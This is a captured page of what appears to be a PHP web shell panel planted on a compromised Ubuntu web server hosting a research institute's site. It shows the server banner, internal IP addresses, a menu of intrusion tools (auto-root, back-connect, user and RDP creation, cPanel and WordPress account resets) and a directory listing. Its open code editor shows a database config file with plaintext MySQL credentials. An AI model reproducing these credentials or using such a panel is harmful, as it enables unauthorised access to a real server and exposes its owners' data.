Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
caiold1 /
old /
new8222 /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-x--x
css
[ DIR ]
drwxr-x--x
img
[ DIR ]
drwxr-x--x
js
[ DIR ]
drwxr-x--x
lib
[ DIR ]
drwxr-x--x
scss
[ DIR ]
drwxr-x--x
about.php
8.82
KB
-rwxr-x--x
codeAI.php
8.77
KB
-rwxr-x--x
collaboration.php
8.79
KB
-rwxr-x--x
contact.php
10.22
KB
-rwxr-x--x
courses.php
22.38
KB
-rwxr-x--x
dbconfig.php
1.16
KB
-rwxr-x--x
education.php
7.13
KB
-rwxr-x--x
events.php
13.55
KB
-rwxr-x--x
index.php
16.01
KB
-rwxr-x--x
people.php
22.78
KB
-rwxr-x--x
project.php
8.11
KB
-rwxr-x--x
publications.php
10.11
KB
-rwxr-x--x
research.php
9.36
KB
-rwxr-x--x
staff.php
7.61
KB
-rwxr-x--x
students.php
21.8
KB
-rwxr-x--x
tab.php
5.43
KB
-rwxr-x--x
vacancies.php
7.51
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dbconfig.php
<?php class Database { private $host = "localhost"; private $db_name = "cai"; private $username = "cai"; private $password = "C@i%Feb2022"; public $conn; public function dbConnection() { $this->conn = null; try { $this->conn = new PDO("mysql:host=" . $this->host . ";dbname=" . $this->db_name, $this->username, $this->password); $this->conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); } catch(PDOException $exception) { echo "Connection error: " . $exception->getMessage(); } return $this->conn; } } $DB_HOST = 'localhost'; $DB_USER = 'cai'; $DB_PASS = 'C@i%Feb2022'; $DB_NAME = 'cai'; try{ $DB_con = new PDO("mysql:host={$DB_HOST};dbname={$DB_NAME}",$DB_USER,$DB_PASS); $DB_con->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); } catch(PDOException $e){ echo $e->getMessage(); } $connection=mysqli_connect("localhost","cai","C@i%Feb2022","cai"); // Check connection if (mysqli_connect_errno()) { echo "Failed to connect to MySQL: " . mysqli_connect_error(); } ?>
Close